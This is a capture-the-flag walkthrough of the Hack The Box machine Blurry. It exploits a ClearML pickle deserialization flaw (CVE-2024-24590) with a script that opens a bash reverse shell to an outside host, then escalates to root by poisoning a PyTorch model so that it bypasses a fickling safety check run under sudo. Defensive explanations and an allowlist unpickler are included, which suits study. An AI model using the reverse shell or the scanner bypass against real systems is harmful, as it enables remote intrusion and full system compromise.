Blurry is a Linux machine running an application with a vulnerable version of ClearML that contains a deserialization flaw (CVE-2024-24590). This vulnerability allows a malicious artifact to be uploaded, leading to arbitrary code execution on the machine of any user who interacts with it. Exploiting this on Blurry results in a shell as the user jippity, who has sudo permissions to run a script that evaluates machine learning models for safety. Inspecting the script shows that it uses fickling, a Python decompiler and static analyzer for pickle files. Fickling's security checks can be bypassed, allowing a poisoned PyTorch model file to be loaded with sudo privileges, which results in a root shell.

Nmap scan:

```
┌──(kali㉿kali)-[~/Desktop/HTB/Blurry]
└─$ nmap -sC -sV -oA nmap/output 10.10.11.19
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-18 17:23 EDT
Nmap scan report for blurry.htb (10.10.11.19)
Host is up (0.049s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds
```

Since the Nmap scan showed a subdomain (http://app.blurry.htb) on port 80, I used ffuf to fuzz virtual hosts for any other subdomains:

```
┌──(kali㉿kali)-[~/Desktop/HTB/Blurry]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.11.19 -H "Host: FUZZ.blurry.htb" -mc all -ac

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.19
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.blurry.htb
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
________________________________________________

api                     [Status: 400, Size: 280, Words: 4, Lines: 1, Duration: 52ms]
files                   [Status: 200, Size: 2, Words: 1, Lines: 1, Duration: 97ms]
app                     [Status: 200, Size: 13327, Words: 382, Lines: 29, Duration: 90ms]
chat                    [Status: 200, Size: 218733, Words: 12692, Lines: 449, Duration: 95ms]
```

I added the discovered subdomains to /etc/hosts and then visited http://chat.blurry.htb, which was a Rocket.Chat workspace.

After I created an account, the Blurry Vision home page came up:



There didn't seem to be anything useful in the General channel, so next I opened the Directory option in the top-left navbar, which also listed an Announcements channel. That channel contained a message from an admin, jippity, about the Black Swan project.

The ClearML instance was located at app.blurry.htb. I signed up for an account there, which brought up the dashboard:





Viewing the Black Swan project mentioned in jippity's announcement showed a list of experiments. "Review JSON Artifacts" looked like the specialized task that reviews the artifacts associated with other tasks:



The settings page showed the ClearML version: 1.13.1.

Searching for vulnerabilities affecting version 1.13.1 led me to CVE-2024-24590 and to an article from HiddenLayer that describes it in more detail.
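CVE-2024-24590 comes down to pickle deserialization. When an object defines `__reduce__`, pickle records a callable plus its arguments instead of the object's state, and `pickle.loads` calls that callable while rebuilding the value. The harmless sketch below is my own illustration, not code from the HiddenLayer article: it uses `operator.mul` where the exploit later uses `os.system`, and the class name `Gadget` is hypothetical.

```python
import operator
import pickle


class Gadget:
    """Hypothetical class whose pickled form means "call operator.mul(6, 7)"."""

    def __reduce__(self):
        # Return (callable, args): pickle stores a reference to the callable
        # and its arguments, not the Gadget instance itself.
        return (operator.mul, (6, 7))


blob = pickle.dumps(Gadget())

# Loading the bytes invokes operator.mul(6, 7); no Gadget object is rebuilt.
restored = pickle.loads(blob)
print(type(restored).__name__, restored)  # int 42
```

Swapping `operator.mul` for any other importable callable, such as `os.system` with a shell command, is what turns loading an untrusted artifact into running attacker-chosen code.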

So next, I started a virtual environment and installed clearml:

┌──(kali㉿kali)-[~/Desktop/HTB/Blurry]

└─$ python3 -m venv venv

┌──(kali㉿kali)-[~/Desktop/HTB/Blurry]

└─$ source venv/bin/activate

┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry]



└─$ pip install clearmlclearml-init runs the setup script which requires credentials:

```
┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry]
└─$ clearml-init
ClearML SDK setup process

Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)
Or create a free account at https://app.clear.ml/settings/workspace-configuration

In settings page, press "Create new credentials", then press "Copy to clipboard".

Paste copied configuration here:
```

As per the instructions, I went to the settings page and chose "Create new credentials".

I copied the generated credentials and pasted them into the clearml-init prompt to complete the setup.

Next, I created the malicious task. The HiddenLayer article contains a script that builds a malicious pickle, which runs arbitrary code when it is deserialized. I set the payload to a reverse shell command:

exploit.py:

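```python
import pickle
import os

from clearml import Task


class RunCommand:
    # On deserialization, pickle calls os.system with this argument
    # (a reverse shell back to the attacking machine)
    def __reduce__(self):
        return (os.system, ("bash -c 'bash -i >& /dev/tcp/10.10.14.26/443 0>&1'",))


command = RunCommand()

# Create a task in the Black Swan project with the "review" tag
task = Task.init(project_name="Black Swan", task_name="shell", tags=["review"])

# Upload the object as a pickled (.pkl) artifact attached to the task
task.upload_artifact(name="pickle_artifact", artifact_object=command, retries=2, wait_on_upload=True, extension_name=".pkl")
```

I started a listener with nc and then ran the script: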

```
┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry]
└─$ python3 exploit.py
ClearML Task: created new task id=4f0dc7ad1545453b9497e65d95c78680
2024-10-18 18:24:04,276 - clearml.Task - INFO - No repository found, storing script code instead
ClearML results page: http://app.blurry.htb/projects/116c40b9b53743689239b6b460efd7be/experiments/4f0dc7ad1545453b9497e65d95c78680/output/log
CLEARML-SERVER new package available: UPGRADE to v1.16.2 is recommended!
Release Notes:
### Bug Fixes
- Fix no graphs are shown in workers and queues screens
ClearML Monitor: GPU monitoring failed getting GPU reading, switching off GPU monitoring
```

Once the task got reviewed after about a minute, nc caught a shell as jippity:

```
┌──(kali㉿kali)-[~/Desktop/HTB/Blurry]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.11.19] 59488
bash: cannot set terminal process group (4851): Inappropriate ioctl for device
bash: no job control in this shell
jippity@blurry:~$ id
id
uid=1000(jippity) gid=1000(jippity) groups=1000(jippity)
jippity@blurry:~$ ls
ls
automation
clearml.conf
user.txt
```

I upgraded the shell with the following commands:

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# press Ctrl+Z to background the shell, then run:
stty raw -echo; fg
```

Checking sudo permissions revealed that jippity could run /usr/bin/evaluate_model as root, without a password, on any .pth model file in /models:

```
jippity@blurry:~$ sudo -l
Matching Defaults entries for jippity on blurry:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jippity may run the following commands on blurry:
    (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
```

/models contained a demo model and a Python script:

```
jippity@blurry:~$ cd /models
jippity@blurry:/models$ ls -la
total 1068
drwxrwxr-x  2 root jippity    4096 Jun 17 14:11 .
drwxr-xr-x 19 root root       4096 Jun  3 09:28 ..
-rw-r--r--  1 root root    1077880 May 30 04:39 demo_model.pth
-rw-r--r--  1 root root       2547 May 30 04:38 evaluate_model.py
```

The /models directory belongs to the jippity group and is group-writable (drwxrwxr-x), so jippity can place new model files there.

Example of running /usr/bin/evaluate_model on demo_model.pth:

```
jippity@blurry:/models$ sudo /usr/bin/evaluate_model /models/demo_model.pth
[+] Model /models/demo_model.pth is considered safe. Processing...
[+] Loaded Model.
[+] Dataloader ready. Evaluating model...
[+] Accuracy of the model on the test dataset: 68.75%
```

/usr/bin/evaluate_model was a bash script:

```
jippity@blurry:/models$ file /usr/bin/evaluate_model
/usr/bin/evaluate_model: Bourne-Again shell script, ASCII text executable
```

/usr/bin/evaluate_model:

```bash
#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi
```

The script extracts the model (a tar or zip archive) into /models/temp and runs fickling, a Python decompiler and static code analyzer, on every extracted file named *.pkl or pickle. If fickling rates any of them OVERTLY_MALICIOUS, the model file is deleted; otherwise the model is considered safe and /models/evaluate_model.py is run on it to test its accuracy. Because only the OVERTLY_MALICIOUS severity triggers deletion, a poisoned pickle just has to avoid that one rating to reach evaluate_model.py, which runs under sudo.
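To make that control flow concrete, here is a rough Python re-creation of the script's pre-check. It is a sketch under assumptions: it detects zip or tar with the standard library instead of calling `file`, and `scan` is a hypothetical callable standing in for fickling that returns a severity string for one extracted file. As in the bash script, only the exact rating OVERTLY_MALICIOUS leads to rejection, and only files named `*.pkl` or `pickle` (such as the `data.pkl` record inside a zip-format PyTorch checkpoint) are scanned at all.

```python
import os
import tarfile
import tempfile
import zipfile
from pathlib import Path


def extract_model(model_path, dest):
    """Extract a .pth archive the way evaluate_model does (tar or zip only)."""
    model_path = os.fspath(model_path)
    if zipfile.is_zipfile(model_path):
        with zipfile.ZipFile(model_path) as zf:
            zf.extractall(dest)
    elif tarfile.is_tarfile(model_path):
        with tarfile.open(model_path) as tf:
            tf.extractall(dest)
    else:
        raise ValueError(f"unknown or unsupported file format for {model_path}")


def pickle_members(root):
    """Mirror `find -type f ( -name '*.pkl' -o -name pickle )`."""
    return sorted(
        p for p in Path(root).rglob("*")
        if p.is_file() and (p.name.endswith(".pkl") or p.name == "pickle")
    )


def is_rejected(model_path, scan):
    """Return True if any extracted pickle is rated exactly OVERTLY_MALICIOUS.

    `scan` is a hypothetical stand-in for fickling: it takes a Path and
    returns a severity string. Every other severity counts as "safe".
    """
    with tempfile.TemporaryDirectory() as tmp:
        extract_model(model_path, tmp)
        return any(scan(p) == "OVERTLY_MALICIOUS" for p in pickle_members(tmp))
```

Writing the check this way makes the weak point easy to see: the whole decision rests on a single string comparison against the scanner's verdict.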

HiddenLayer has another article about weaponizing PyTorch models that includes a proof-of-concept (PoC) script. The script injects arbitrary code into an existing PyTorch model and offers four ways to execute it: system, exec, eval, and runpy. Some of these options can bypass security checks, including those performed by fickling.
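Fickling is a static analyzer: it inspects the pickle's opcode stream without executing it, and the callables a pickle imports are visible in that stream. The rough sketch below lists those imports using only the standard library's `pickletools`. It is not fickling's algorithm (fickling decompiles the pickle into a Python AST and applies its own rules, which I have not reproduced), it simplifies protocol 4+ `STACK_GLOBAL` handling by ignoring memo lookups, and `imported_callables` and `Gadget` are hypothetical names.

```python
import operator
import pickle
import pickletools

# Opcodes that push a str literal onto the unpickler's stack
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def imported_callables(data):
    """Return "module.name" for each global the pickle imports, without loading it."""
    found = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Protocols 0-3: the argument is "module name" (space-separated)
            module, name = arg.split(" ", 1)
            found.append(f"{module}.{name}")
        elif opcode.name in STRING_OPS:
            recent_strings.append(arg)
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Protocol 4+: module and name were pushed as the two latest strings
            # (simplification: strings fetched back from the memo are not tracked)
            found.append(f"{recent_strings[-2]}.{recent_strings[-1]}")
    return found


class Gadget:
    def __reduce__(self):
        return (operator.mul, (6, 7))


for protocol in (2, 4):
    print(protocol, imported_callables(pickle.dumps(Gadget(), protocol=protocol)))
```

Nothing is unpickled here; the function only walks the opcodes. Whether a given import is then judged dangerous is a separate policy decision, and that policy is where a scanner's rules can fall short.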

So I copied demo_model.pth to my machine and installed torch:

```
┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry]
└─$ pip install torch
```

Next, I used the PoC (torch_pickle_inject.py) with the system option to embed the bash command into the demo model (demo_model.pth):

```
┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry]
└─$ python3 torch_pickle_inject.py demo_model.pth system "bash"
```

torch_pickle_inject.py saves a backup of the original as demo_model.pth.bak and poisons demo_model.pth in place. I renamed the poisoned file to demo_model_1.pth and transferred it to /models on Blurry. Running the evaluation script on it with sudo then spawned a root shell:

```
jippity@blurry:/models$ sudo /usr/bin/evaluate_model /models/demo_model_1.pth
[+] Model /models/demo_model_1.pth is considered safe. Processing...
root@blurry:/models# id
uid=0(root) gid=0(root) groups=0(root)
root@blurry:/models# cd /root
root@blurry:~# ls
datasets  root.txt
```

I tested each of the PoC's options (system, exec, eval, and runpy). Both exec and eval were rated OVERTLY_MALICIOUS, so the model was deleted. However, system (as shown above) bypassed the fickling check, and so did runpy.

Running torch_pickle_inject.py against the demo model to embed the bash command using runpy:

```
┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry]
└─$ python3 torch_pickle_inject.py demo_model.pth runpy "import os; os.system('bash')"
```

As with system, I transferred the poisoned model to Blurry and ran the evaluation script with sudo to get a root shell:

```
jippity@blurry:/models$ sudo /usr/bin/evaluate_model /models/demo_model_1.pth
[+] Model /models/demo_model_1.pth is considered safe. Processing...
root@blurry:/models# id
uid=0(root) gid=0(root) groups=0(root)
```
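The split between exec/eval (caught) and system/runpy (not caught) suggests that rating a pickle by recognizing known-dangerous calls can miss equivalent primitives. The defensive pattern described in Python's `pickle` documentation ("Restricting Globals") works the other way around: an allowlist enforced by overriding `Unpickler.find_class`. A minimal sketch follows; the `ALLOWED` set and the `Gadget` class are hypothetical examples, and recent PyTorch releases offer a comparable restricted mode through `torch.load(..., weights_only=True)`.

```python
import io
import operator
import pickle
from collections import OrderedDict

# Hypothetical allowlist: the only globals this loader is allowed to import.
ALLOWED = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    return AllowlistUnpickler(io.BytesIO(data)).load()


class Gadget:
    def __reduce__(self):
        return (operator.mul, (6, 7))


print(restricted_loads(pickle.dumps(OrderedDict(lr=0.01))))
try:
    restricted_loads(pickle.dumps(Gadget()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

With an allowlist, a callable the defender never anticipated is rejected by default instead of slipping through.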